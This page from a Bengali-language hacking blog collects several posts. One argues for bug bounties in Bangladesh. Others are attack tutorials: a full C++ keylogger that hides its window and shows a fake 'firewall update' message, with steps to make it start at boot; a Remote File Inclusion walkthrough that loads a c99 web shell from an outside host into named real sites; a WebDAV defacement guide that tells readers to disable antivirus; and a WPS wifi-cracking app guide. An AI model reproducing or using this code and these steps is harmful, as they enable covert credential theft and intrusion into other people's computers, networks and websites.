তাওসিফ তুরাবি: হ্যাকিং

হ্যাকিং

হ্যাকিং লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

হ্যাকিং কি কোনো অপরাধ?

আসসালামু আলাইকুম,

হ্যাকারকে আমরা একজন অপরাধী হিসেবেই জানি। অনেকেই হ্যাকিংকে ভয় পাই। এই ভয়ে জিনিসটা শেখারও চেষ্টা করি না। আচ্ছা, একজন হ্যাকার কেনো অপরাধী? সে বেআইনিভাবে তথ্য চুরি করছে বলে? আচ্ছা, সে ক্ষেত্রে সে নিশ্চয়ই অপরাধী।

আমরা হয়তো জেনে থাকবো, কোনো কম্পিউটার নেটওয়ার্কই বাগমুক্ত নয়। তার মানে যে কোনো নেটওয়ার্ক বা সারভার যেকোনো ভাবে ভালনারেবল হতে পারে। একজন হ্যাকার তার স্কিল দিয়েই সেই সাইট হ্যাক করবে। একজন হ্যাকারের সহজাত প্রবৃত্তিই এটা। সে চেষ্টা করবেই তার হাতের নাগালের ভালনারেবল সিস্টেমে প্রবেশ করতে।
এখন একটা বিষয় লক্ষ করি।
আমরা কি জানি, ফেসবুক তাদের বাগ বাউন্টি প্রোগ্রাম চালু করেছে?

বাগ বাউন্টি কি? বাগ বাউন্টি হল সেই ওল্ড ওয়েস্টের মতো বাউন্টির ব্যাবস্থা। অপরাধিকে ধরিয়ে দিতে পারলেই ডলার পুরষ্কার। আর এখানে অপরাধীর স্থলে কেবল বাগ ধরিয়ে দিতে হবে। ফেসবুক তাদের ছোট বড় যেকোনো সিকিউরিটি বাগ ধরিয়ে দিতে পারলেই ১০০০০ ডলার পুরষ্কার দিবে। দশ হাজার ডলার! শুনতে কম হলেও বাংলাদেশি মুদ্রায় প্রায় দশ লক্ষ টাকার বেশি!

দেখুন, ফেসবুক হ্যাকারদেরই ভালো কাজে ব্যাবহার করছে। শখের হ্যাকার বাদেও অনেকে হ্যাকিংকে পেশা হিসেবে নেন, যাদের আমরা সার্টিফিকেট প্রাপ্ত হ্যাকার বা সাইবার সিকিউরিটি এনালিস্ট বলেই চিনি। তারা বেশ সহজেই বিভিন্ন আইটি ফার্মে এবং অন্যান্য প্রতিষ্ঠানে ভালো পজিশনে এবং পদে চাকরি করে থাকেন।

কিন্তু যারা নিজে নিজে হ্যাকিং শিখেছেন, কোন শিক্ষা প্রতিষ্ঠান থেকে সাইবার সিকিউরিটি নিয়ে ডিপ্লোমা নেওয়ার চেষ্টা করেননি, অনেক সময় তাদের স্কিলও প্রফেশনালদের হার মানিয়ে দেয়। কিন্তু আমরা তাদের যোগ্যতার স্বীকৃতি দেই না। অন্তত বাংলাদেশের মতো দেশে তো অবশ্যই না। কেন? তাদের স্কিল হল আসল ফ্যাক্ট, সার্টিফিকেট না।

র‍্যাবের ওয়েবসাইট হ্যাকিং নিয়ে একটা প্রতিবেদন ছিল, যার একাংশ আমি এখানে দিচ্ছি,

সোর্সঃ https://taiyabs.wordpress.com/

র‌্যাব জানায়, শাহী মির্জা মিরপুর-৬ নম্বর সেকশনে অবস্থিত বেসরকারি পলিটেকনিক ইন্সটিটিউট সাইক ইন্সটিটিউট অব ম্যানেজমেন্ট টেকনোলজির কম্পিউটার সায়েন্সের ৪র্থ সেমিস্টারের ছাত্র। তার বাবা মুবাশ্বের আলী পুলিশের সাব-ইন্সপেক্টর। তিনি সিলেটের ফেঞ্চুগঞ্জ থানায় কর্মরত। শাহী মির্জা তার ইন্সটিটিউটের তিন বন্ধু সৈয়দ ইসতিয়াক, জায়েদুল ও তাওহিদুল ইসলামসহ মিরপুর-১ নম্বর সেকশনের ১ নম্বর রোডের এফ ব্লকের ২৫ নম্বর বাড়ির ৬ষ্ঠ তলায় একটি মেসে ভাড়া থাকে। গত ৫ সেপ্টেম্বর র‌্যাবের ওয়েব সাইট হ্যাকড হওয়ার পর র‌্যাব ইন্টিলিজেন্স ও আইটি শাখা তদন্ত নামে। হ্যাকিংয়ের মূল পরিকল্পনাকারী শাহী মির্জা। সে তার কম্পিউটারে ব্যবহৃত ইন্টারনেটের আইপি নম্বর (ইন্টারনেট প্রটোকল) ব্যবহার করে র‌্যাবের ওয়েব সাইট হ্যাকিং করে।
সূত্র জানায়, র‌্যাব তদন্ত করে দেখতে পায়, লিনাক্স নামে একটি ইন্টারনেট সার্ভিস প্রোভাইডারের লাইন থেকে এই হ্যাকিং করা হয়েছে। পরে ইন্টারনেটের আইপি নম্বর সংগ্রহ করে র‌্যাব তদন্তে করে শনিবার রাতে মিরপুর থেকে ঐ ৪ হ্যাকারকে গ্রেফতার করে। তাদের মেস থেকে ২ টি কম্পিউটার ও ৭২ টি সিডি জব্দ করে।
র‌্যাব মহাপরিচালক জানান, হ্যাকিং কোন নতুন টেকনোলজি নয়। কম্পিউটার প্রোগ্রাম সম্পর্কে ধারণা থাকলে যে কেউ হ্যাকিং করতে পারে। বর্তমানে যেসব ছাত্র-ছাত্রী কম্পিউটার বিষয়ে পড়াশুনা করছে তাদের অনেকেই হ্যাকিং করা কৃতিত্ব মনে করেন। কিন্তু হ্যাকিং করা একটি অপরাধ।

আইন নিয়ে বলা আছে,

র‌্যাব আইটি শাখার পরিচালক কমান্ডার মইনুল ইসলাম জানান, ওয়েব সাইট হ্যাকিং করলে বাংলাদেশ আইসিটি(তথ্য ও যোগাযোগ প্রযুক্তি) আইন-২০০৬-এর ৫৪ ও ৫৫ ধারায় সর্বোচ্চ সাজা ১০ বছরের জেল ও ১ কোটি টাকা জরিমানার বিধান রয়েছে। তাই কেউ যেন কৃতিত্বপূর্ণ কাজ মনে করে ওয়েব সাইট হ্যাকিং না করে।

এখানে আমার প্রশ্ন, হ্যাকিং কেন অপরাধ? এটাকে আমরা কেন পজিটিভ কাজে লাগাই না? হ্যাকারডের সাহায্য নিলেই কিন্তু র‍্যাবের আইটি শাখা শক্তিশালি হতে পারে।

বাংলাদেশে প্রতিটি আইটি ফার্ম এবং ওয়েবসাইট সংবলিত প্রতিষ্ঠানে যদি বাগ বাউন্টি প্রোগ্রাম থাকতো, তবে বাংলাদেশের রুকি থেকে উপরের ধাপের হ্যাকাররা যেমন উৎসাহ পেতো, দেশের জন্য কিছু করার জন্য তাদেরও ইচ্ছে হতো। সরকারি ভাবে যদি কর্তিত্বমান হ্যাকারদের স্বীকৃতি এবং কর্মসংস্থান হতো, সুযোগ সুবিধা দেওয়া হতো, তবে বাংলাদেশ ব্যাঙ্কের রিজার্ভ চুরি হতো না, ভারতীয় সাইবার সিকিউরিটি এনালিস্টের যায়গায় বাংলাদেশি একজন বহাল থাকতে পারতো।বাংলাদেশের স্বর্ণ সন্তানেরা এবং মেধা বাহিরে পাচার হতো না। র‍্যাবের ওয়েবসাইট হ্যাক করে জেল খাটা ছেলেটা আজ মজিলা ইনকর্পোরেটেডে চাকরি করে। র‍্যাবের ওয়েবসাইট হ্যাক করা অপরাধ। যদি বিদেশী কোনো চক্র হ্যাক করতো তখন ৪ জন হ্যাকার কোথা থেকে গ্রেপ্তার করতো? ওয়েবসাইট ভালনারেবল রেখে দিলে যে কেউ প্রবেশ করার চেষ্টা করবে। র‍্যাবের আইটি উইঙ্গের সেখানে দরকার ছিল বাগ বাউন্টি প্রোগ্রামের ব্যাবস্থা করা।

দরজা জেনেশুনে খোলা রাখবেন, তখন চোর ঢুকলে চোরের দোষ?

কেন এই অবহেলা? বিদেশি সাইবার সিকিউরিটি এনালিস্ট যে সব করতে পারবে এমন কোনো কথা নেই।যোগ্যতা অনুযায়ী বাংলাদেশি হ্যাকাররা যে ভারতীয় হ্যাকারদের, এমনকি সারা বিশ্বের হ্যাকারদের থেকে এগিয়ে এটা বলতে আমার কোনো দ্বিধা নেই।

বিভাগঃ হ্যাকিং

আরও পড়ুন

আপনার নিজের কম্পিউটারে যারা অনলাইনে লগিন করে তাদের সবার আইডি ও পাসওয়ার্ড দখলে নিন একটা সি++ প্রোগ্রাম দিয়ে! - C++ keylogger

Tawsif Torabi ৩:২৪ PM 0 Comment

Tawsif Torabi

আপনার নিজের কম্পিউটারে যারা অনলাইনে লগিন করে তাদের সবার আইডি ও পাসওয়ার্ড দখলে নিন একটা সি++ প্রোগ্রাম দিয়ে! - C++ keylogger

আসসালামু আলাইকুম,
এখন আপনিও পারবেন আপনার পিসির সব ইউজারদের ডাটা গোপনে জেনে নিতে। এটা যদিও নীতি বিরুদ্ধ, তবুও জানতে আপত্তি কোথায়? আপনারা কেউ কারো ক্ষতির উদ্দেশ্যে এটি ব্যাবহার করবেন না বলে আমার বিশ্বাস। এটা একটা সি++ দিয়ে প্রোগ্রাম করা কম্পিউটার প্রোগ্রাম। মাত্র 93 লাইন প্রোগ্রাম করা আছে এতে।

এটা উইন্ডোজ ফায়ারওয়াল ব্লক করে দিতে পারে। তাই আপনাকে একটা এক্সেপশন তৈরি করে নিতে হবে।

এটি রিমোট কন্ট্রোল্ড নয়, আপনার পিসিতেই একটা টিএক্সটি ফাইলে কি-লগ ডাটা রাখবে।

সি++ সোর্স কোডঃ

#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();
int main()
{

cout<<"Connecting Port to download windows firewall updates... Connected!" < system ("pause");

Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState (i) == -32767)

Save(i, "TaAr.TXT");
}

system ("pause");
return 0;

}

}
/* ************************************** */
/* ************************************** */
int Save (int key_stroke, char *file)
{

if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", "[.]");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose(OUTPUT_FILE);
return 0;
}
/* ************************************** */
/* ************************************** */
void Stealth()
{
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth,0);
}

এটাকে কেবল ইএক্সই ফাইলে কম্পাইল করে নিবেন, এজন্যে কোডব্লকস ইউজ করতে পারেন। অথবা অন্য কোন কম্পাইলার ইউজ করতে পারেন। কম্পাইল করতে না পারলে এই ফাইলটি ডাউনলোড করে ইউজ করুন। ফায়ারওয়াল এক্সেপ্সন না থাকলে ডাউনলোড বা রান করতে পারবেন না।

ডাউনলোড করে নিন

স্টার্টআপ প্রোগ্রাম বানাবেন কিভাবে?

স্টার্টআপের সময় একে অটোমেটিক চালু করতে স্টার্ট মেনুতে গিয়ে >All programs ক্লিক করে Startup খুজে বের করুন, নিচের দিকে আছে। রাইট ক্লিক করে ওপেন ক্লিক করুন। সেখানে কি লগার অ্যাপলিকেশনের শর্টকাট পেস্ট করে দিন।কাজ শেষ! এবার প্রতিবার উইন্ডোজ চালু হলে সেও চালু হবে!

I'm on facebook

বিভাগঃ প্রোগ্রামিং হ্যাকিং

আরও পড়ুন

RFI (Remote File Inclusion) হ্যাকিং!

Tawsif Torabi ৭:২৫ PM 0 Comment

Tawsif Torabi

আসসালামু আলাইকুম,

কেমন আছেন?

গত কিছু দিন যাবত আপনাদের সাথে আমি হ্যাকিং ওয়ার্ল্ডের নানা কন্টেন্ট শেয়ার করছি। আমি নিজেও একজন শিক্ষানবিস বা নিউবাই। তাও যত জানি, আপনাদের জন্য উজার করে দিচ্ছি। আমাদের সিকিউরিটি অ্যানালিস্ট কমল ভাই এই বিষয়ে এক্সপার্ট এবং তার কল্যাণেই আমাদের এই জিআর+ ওয়েবসাইট টিকে আছে। ধন্যবাদ তাকে।

আজ দেখাব Remote file inclusion হ্যাকিং।

রিমোট ফাইল ইনক্লুশন বাংলা করলে দাড়ায় দূরবর্তী ফাইল প্রবেশ করানো। মানে আপনি এই হ্যাকিং মেথডের সাহায্যে কোন ওয়েবসাইটে অন্ন সার্ভারে হোস্ট করা প্রোগ্রাম শেল হিসেবে চালাতে পারবেন।

Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনান্য হ্যাকিং মেথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় মেথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এখন ৯০% ফায়ার ওয়াল আরএফআই ইঞ্জেকশান রুখতে পারে, তাই এই মেথড সহজে কাজে আসে না।

এখন গুগল ডরক দিয়ে সারচ করে ভালনারেবল সাইট খুজে নিন, চেস্টা করবেন দেশি ওয়েবসাইট গুলো বাদ দিয়ে চলতে।
এইযে গুগল ডরক,

inurl:index.php?page=

উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো দেখতে পাবেন।

এখন ভালনারেবল কিনা পরীক্ষা করতে হবে।

নিচের লিঙ্কের মত পরিক্ষা করে দেখুন।

http://www.targetsite.com/index.php?page=http://blog.grplusbd.net

এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….

http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com

তাহলে এটি দেখাবে…

এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…

এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে।

আমি আপনাদের দেখাব c99 shell আপলোড করা।

এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.comইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…

http://h1.ripway.com/tjunselected/c99shell.php?

এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?

এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?

তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।

By Unselected Tuner

বিভাগঃ হ্যাকিং

আরও পড়ুন

সোশ্যাল এঞ্জিনিয়ারিং কি? - What is Social Engineering?

Tawsif Torabi ৭:২৪ PM 0 Comment

Tawsif Torabi

সোশ্যাল এঞ্জিনিয়ারিং কি? - What is Social Engineering?

আসসালামু আলাইকুম,

কেমন আছো?
কয়দিন আগে শুনেছো, বাংলাদেশ ব্যাংকের আমেরিকান রিজার্ভ থেকে ৮০০ কোটি টাকা চুরি হয়ে গেছে হ্যাকিঙের মাধ্যমে। বাংলাদেশের গণ্যমান্য সিকিউরিটি অ্যানালিস্টরা বলেছেন, ম্যালওয়্যার দ্বারা এই চুরি হতে পারে। অথবা কি-লগার ভাইরাস দ্বারা এই অপকর্ম হতে পারে। তবে অনেকে দায়ি করেন সোশ্যাল এঞ্জিয়ারিংকে।

সোশ্যাল এঞ্জিনিয়ারিং কিন্তু কোনও হ্যাকিং মেথড নয়। আবার এক ধরনের হ্যাকিং মেথড।

ধরো, তোমার একটা ক্লোজ ফ্রেন্ড, তুমি ওকে খুব ট্রাস্ট কর, ও তোমাকে ট্রাস্ট করে। তো তুমি ওর কাছে বললে,

"দোস্তো, আমার ইমেইল ডি-এক্টিভ হয়ে গেছে, আমার এক্ষুনি একটা কম্পিটিশনে রেজিস্ট্রেশন করতে হবে, তোর ইমেইল আর পাসওয়ার্ড আমাকে একটু দে প্লিজ, পরে চেঞ্জ করে নিস"

তো তোমার বন্ধু সরল বিশ্বাসের সাথে তোমাকে ইমেল আর পাসওয়ার্ড দিয়ে দিবে। তুমি যদি তোমার কাজ ঠিক মতো করে ওকে ইমেইল আর পাসওয়ার্ড অক্ষত ফিরিয়ে দাও তবে ভালো। তা না করে যদি তুমি ব্যাকআপ ইমেইলে তোমার ব্যাক্তিগত ইমেল প্রবেশ করিয়ে দাও, তার ব্যাক্তিগত ইমেল পরে ফেলো বা পাস ওয়ার্ড বদলে দাও তবে বন্ধুটির ইমেইল তুমি সোশ্যাল এঞ্জিনিয়ারিং করে দখল নিলে।
তুমি কিন্তু ইচ্ছা করলে কোনও ওয়েবসাইটে গিয়ে ইচ্ছে করলেই তোমার বন্ধুর প্রোফাইল হ্যাক করতে পারতে। কারন তুমি জেনে থাকতে পারো তার ফ্যামিলির সম্পর্কে, তার ব্যাক্তিগত বিষয় সম্পর্কে। আর সিকিউরিটি কোশ্চেন গুলোর আনসার দিলেই তুমি হ্যাক করতে পারতে, তবে বর্তমানে সাইবার সিকিউরিটি আরও উন্নত হয়েছে। মোবাইল ভেরিফিকেশন এসেছে।

অনেকে দেখি আমার ইমেল বা ফেসবুকে ধরনা দেয়, ভাই ফেসবুক হ্যাকের টিউটোরিয়াল দেন।

আমার তখন বিরক্ত লাগে, আমি তো আর মার্ক জাকারবারগ না, যে ফেসবুক ডাটাবেজে এক্সেস নিবো।

আমার জ্ঞান যদি মার্ক ভাইয়ার মতো হইত, তবে আমি ফেসবুক হ্যাক করতাম, করতেও পারতাম। না করে হয়তো ফেসবুকের চেয়ে ভালো কিছু বানিয়ে বিলিওনেয়ার হতে পারতাম। তাই আমার মতে ফেসবুক হ্যাক সম্ভব না। যদিও আতি পাতি হ্যাক হওয়ার খবর শোনা যায়, তার কারন হলো ইমেইলের সহজ পাসওয়ার্ড দেওয়া, যেমন যেইটা ইমেইল, সেটাই পাসওয়ার্ড দেওয়া ইত্যাদি বড় ভুল।

তো প্রসঙ্গে আসি।

আমরা যে ফিসিং (phising) লিঙ্কের কথা জানি, সেটাও একরকম সোশ্যাল এঞ্জিনিয়ারিং। কেননা ফিসিং লিঙ্কে বা ফিসিং পেজে থাকে বিশ্বাস করার মতো কন্টেন্ট, পেছনে চুরির ফাঁদ।

এই নমুনা দেখো,

ছবিটা বড় করলে দেখবে, ইউআরএল মোটেও ফেসবুক না, ajaira-wajir.com

মানে এইটা ফেসবুকের মুখোশে আছে। এখানে ফেইসবুক লগইন হয় না, উল্টো পাসওয়ার্ড চুরি যায়। লগিনের সাথে সাথে তোমার ফেইসবুক লগইন - পাসওয়ার্ড চলে যায় হ্যাকারের হাতে।

ঠিক এই ভাবেই যারা অটো লাইকার ইউজ করো, তাদের আইডি হ্যাক হয়ে যায়।

অটো লাইকার যখন ফেইসবুকে এক্সেস চায় তখন আমরা এক্সেস দিয়ে দেই। এভাবেই অ্যাপ গুলো দিয়েও হ্যাক হয় অনেক সময়।

সোশ্যাল এঞ্জিনিয়ারিং -এর সংজ্ঞা দিয়েছেন বাংলাদেশের একজন সিকিউরিটি অ্যানালিস্ট মেহেদি হাসান,

"কোনও মানুষদ্বারা ভার্চুয়াল জগতে অযাচিত কাজ যেমন, কোনও কর্পোরেট অফিসের নেটওয়ার্কে প্রবেশ, তাদের অনলাইন সিকিউরিটি, ফায়ারওয়াল, একাউন্ট নিবিড় ভাবে পর্যবেক্ষণ করে তাতে আক্রমন করা। এক্ষেত্রে কোনও সফটওয়্যারের সাহায্য নেওয়া যায় বা নিজের কোড করা কোনও হার্ডওয়্যার বা প্রোগ্রাম কাজে লাগানো যায়।"

সোশ্যাল এঞ্জিনিয়ারিং ৪ প্রকার,

impersonation
posing as imp. user
3rd person approach
technical support

কম্পিউটার ভিত্তিক সোশ্যাল এঞ্জিনিয়ারিং ৪ ভাগে বিভক্ত,

mail/im attachments
pop up windows
sweepstakes
spam mail

বিভাগঃ হ্যাকিং

আরও পড়ুন

আসুন মোবাইলে ওয়াইফাই হ্যাক করি! Let's hack WIFI on mobile!

Tawsif Torabi ১১:৫৮ AM 0 Comment

Tawsif Torabi

আসুন মোবাইলে ওয়াইফাই হ্যাক করি! Let's hack WIFI on mobile!

আসসালামু আলাইকুম,

এখন মাত্র ৫ মিনিটেই হ্যাক করে ফেলুন যেকোনো ডব্লিউপিএস সিকিউরড ওয়াইফাই!

কী ভাবে?
ধাপে ধাপে জেনে নেয়া যাক সেটাই!

এই পদ্দতিতে Wi-Fi হ্যাক করার প্রথম শর্ত

• আপনার ফোনটাকে হতে হবে অ্যান্ড্রয়েড অপারেটিং সিস্টেম চালিত।
• ফোনের প্রসেসর আর র‍্যাম ভালো হতে হবে।
• আপনার অ্যান্ড্রয়েড ফোন সেটটি রুট হওয়াও আবশ্যক।

WPS কানেক্ট

WPS একটা অ্যাপ। এই অ্যাপ দিয়েই আপনি যে কারো ফোনের Wi-Fi সিকিউরিটি বাইপাস করতে পারবেন। তার জন্য প্রথমেই দরকার অ্যাপটা ডাউনলোড করা।

এখন,
অ্যাপ-এ যান। দেখবেন, WPS সিকিউরিটি দেয়া অনেকগুলো Wi-Fi অপশন দেখাচ্ছে। WPS সাপোর্টেড বলে আপনাকে আলাদা করে আর পাসওয়ার্ড টাইপ করতে হবে না। স্রেফ কানেক্ট করুন যে কোনও একটার সঙ্গে। তার পর, আপনার যা ইচ্ছে! ডাউনলোড, আপডেট- যা খুশি!

শুধু একটা কথা মনে রাখুন। এই অ্যাপটা ৪.১.২ ছাড়া অন্য কোনো অ্যান্ড্রয়েড ভার্সনে কাজ করে না।

বিভাগঃ এন্ড্রয়েড এন্ড্রয়েড অ্যাপ হ্যাকিং

আরও পড়ুন

আইপি অ্যাড্রেস যেভাবে খুঁজে লোকেশন বের করবেন! Thats how you'll find out IP Address and it's location!

Tawsif Torabi ৪:০৭ PM 0 Comment

Tawsif Torabi

আইপি অ্যাড্রেস যেভাবে খুঁজে লোকেশন বের করবেন! Thats how you'll find out IP Address and it's location!

আসসালামু আলাইকুম,
গত পোস্টে তো আইপি অ্যাড্রেসের কথা জানালাম। এবার আইপি অ্যাড্রেস খুঁজে বের করা শেখাবো আপনাদের।
আইপি অ্যাড্রেস হ্যাকিঙের এবিসি, মানে প্রাথমিক। আইপি ছাড়া হ্যাকিং অচল। তাই এই পোস্ট দেখা দরকার আপনার।

প্রথমে আমি নিজেদের আইপি বের করা শেখাবো।

নিজের আইপি বের করাঃ

স্টার্ট বাটন চাপুন
Command Prompt লিখুন এবং ওপেন করুন।
অথবা কীবোর্ডের স্টার্ট বাটন আর R বাটন একত্রে চাপ দিন। রান কমান্ড আসবে, ওখানে cmd লিখে এন্টার চাপলেই একটা টার্মিনাল ইন্টারফেস পাবেন, এই টার্মিনাল ইন্তারফেস দেখলেই নিজেকে প্রফেশনাল হ্যাকার মনে হয় :3
এবার netstat -n লিখে এন্টার চাপুন।

এবার Local IP সব গুলো একরকম পাবেন, এবং এটাই আপনার আইপি।

অথবা,

www.google.com এ যান।
IP Address লিখে সার্চ করলেই সবার আগে আপনার আইপি দেখতে পাবেন।

কোনও ওয়েবসাইটের আইপি খুঁজে বের করাঃ

Command Prompt ওপেন করুন। start->Run->cmd
এবার লিখুন tracert google.com
তাহলে এবার কমান্ড প্রমোট গুগোল ডট কমকে ট্রেস রাউট করবে।
প্রথমেই যে আইপি আসবে সেটা গুগলের আইপি এবং পরের গুলো গুগলের একটিভ সার্ভারের আইপি।
এভাবে আপনি গুগলের বদলে অন্য কোনও ওয়েবসাইট বসিয়ে আইপি ট্রেস করতে পারবেন। এভাবে আপনি ৩০টি পর্যন্ত হোপ দেখতে পাবেন।
কিছু ওয়েবসাইটের আইপি এর পাশে * দেখতে পাবেন। এর মানে এতে ফায়ার ওয়াল একটিভ করা, আপনি একে স্প্যাম করতে পারবেন না।

হোপ কি?
আপনি যখন কোনও ওয়েবসাইট লিঙ্কে ক্লিক করেন বা অ্যাড্রেস বারে এন্টার করেন, তখন আপনার ডিভাইস কিছু ডাটা প্যাকেট ঐ ওয়েবসাইটের সার্ভারে পাঠায়, আবার ঐ ওয়েবসাইট কিছু ডাটা প্যাকেট আপনাকে পাঠায়। এর ফলে আপনি এই ওয়েবসাইটকে দেখতে পান। এখনে গুগলের কাছে আপনি কমান্ড দেওয়ার পর ৩০টি হোপ বা ডাটা প্যাকেট রিসিভ করবেন, এগুলোই আপনি কমান্ড স্ক্রিনে দেখতে পান। গুগলের একাধিক সার্ভার থাকায় হোপের সংখ্যা বেশি হয়।

আপনি হয়তো ভাবতে পারেন, মিডিয়া ফায়ার বা র‍্যাপিড শেয়ারের মতো সাইটে এগুলো দেখা বা তথ্য চুরি সম্ভব নয়।
সবি সম্ভব।

আপনি যদি কমান্ডে লেখেন nslookup url.com

এখানে যদি লেখা আসেও non-authorotative answer, তবে বুঝবেন এতে স্পরশকাতর তথ্য আছে।
যেকোনো আইপি এর লোকেশন পেতে আইপি এই ওয়েবসাইটে সিয়ে সার্চ করেন আর মজা দেখেন!

https://www.iplocation.net/

বিভাগঃ হ্যাকিং

আরও পড়ুন

webdav দিয়ে কোনও aspx vulnerable ওয়েবসাইট ডিফেস করুন! (ইমেজ টিউটোরিয়াল)

Tawsif Torabi ৪:০৫ PM 0 Comment

Tawsif Torabi

webdav দিয়ে কোনও aspx vulnerable ওয়েবসাইট ডিফেস করুন! (ইমেজ টিউটোরিয়াল)

আসসালামু আলাইকুম,

কেমন আছেন?
আমি মোটামোটি ভালই আছি আল্লাহর রহমতে। দোয়া রাখবেন।

আজকে আপনাদের ওয়েবডাভ দিয়ে এএসপি সাইট ডিফেস করা শেখাবো!

এক্ষেত্রে আপনার দুটি জিনিশ দরকার!

1. Rootkit - এখানে ডাউনলোড করুন

2. Shell - এখানে ডাউনলোড করুন

Google dork : /Hmei7.asp;.txt

রুটকিট ডাউনলোড দেওয়ার সময় আন্টিভাইরাস ভাইরাস ডিটেক্ট করলেও করতে পারে। চিন্তার কোনো কারণ নেই এটা কোনো ভাইরাস নয়। যদি ভাইরাস মনে হয় তাহলে গুগল থেকে ডাউনলোড দিয়ে নামিয়ে নেন। অথবা এন্টিভাইরাস ডিসেবল করে ডাউনলোড করুন।

এখন আপনি রুটকিট টি ওপেন করুন:

এখন নিচের ছবি অনুসরণ করুন:

এখন আপনি এ রকম দেখতে পাবেন:

এখন্ "আপনার শেল এর নাম" যে কোনো নাম এবং " .asp ; .jpg "

উদাহরণ : "[Any-Name].asp;.jpg"

এখন "Write your shell Here" থেকে ক্লিক "Load Shell from File" করে উপরে যে shell টা দিয়েছিলাম তা আপলোড করে নিন

এখন আমাদের shell upload করা শেষ! এখন আমরা আমাদের shell সাইট এ upload করব

এ জন্য target site http://www.dee.co.il/

সাইট deface দেওয়া শেষ

এখন ঐ লিঙ্কে যান, মানে http://www.dee.co.il/Hmei7.asp;.png

বিভাগঃ হ্যাকিং

আরও পড়ুন

আইপি অ্যাড্রেস কি? What is IP Address?

Tawsif Torabi ৭:০৬ PM 0 Comment

Tawsif Torabi

আসসালামু আলাইকুম,আজকে আপনাদের জানাবো আইপি অ্যাড্রেস এবং এর খুঁটিনাটি অন্যান্য বিষয় সম্পর্কে।

একজন হ্যাকারের কাছে আইপি অ্যাড্রেস একটা গুরুত্তপূর্ণ জিনিস। তাকে তার নিজের আইপি লুকিয়ে রাখতে হয় পরিচয় গোপনের জন্য তেমনি অন্যদেরটা জানতে হয় হ্যাক করার জন্য।

আইপি অ্যাড্রেস (IP Address) হল Internet Protocol Address. এটি কিছু সংখ্যা দ্বারা তৈরি হয় এবং যেসকল ডিভাইস অনলাইনে যুক্ত তার প্রতিটির একটা আইপি আছে যা একটা আরেকটির সাথে মেলে না। প্রতিটি আইপি অ্যাড্রেস ইউনিক হয়। এবং আইপি অ্যাড্রেস দিয়েই এক সার্ভার আরেক সার্ভারে ডাটা ট্র্যান্সফার করে। আপনার পিসিকে আপনার ইন্টারনেট সার্ভিসদাতা প্রতিষ্ঠান আইপি দিয়েই সনাক্ত করে।

আইপি অ্যাড্রেস মূলত দুইটি কাজ করে থাকে,

হোস্ট বা নেটওয়ার্ক ইন্টারফেস খুঁজে বের করে, যাতে আপনি অন্য সার্ভারের সাথে কানেক্ট করতে পারেন।
নেটওয়ার্ক ব্যাবহারকারির অবস্থান চিহ্নিত করা। প্রতিটি আইপি অ্যাড্রেস একটা নির্দিষ্ট এলাকা বোঝায়। এলাকা ভেদে আইপি ভিন্ন হয়। আইপি অ্যাড্রেস মূলত বাইনারি (Binary) সংখ্যা। কিন্তু এটাকে আমরা কিছু সংখ্যা বা অক্ষরে দেখতে পাই।

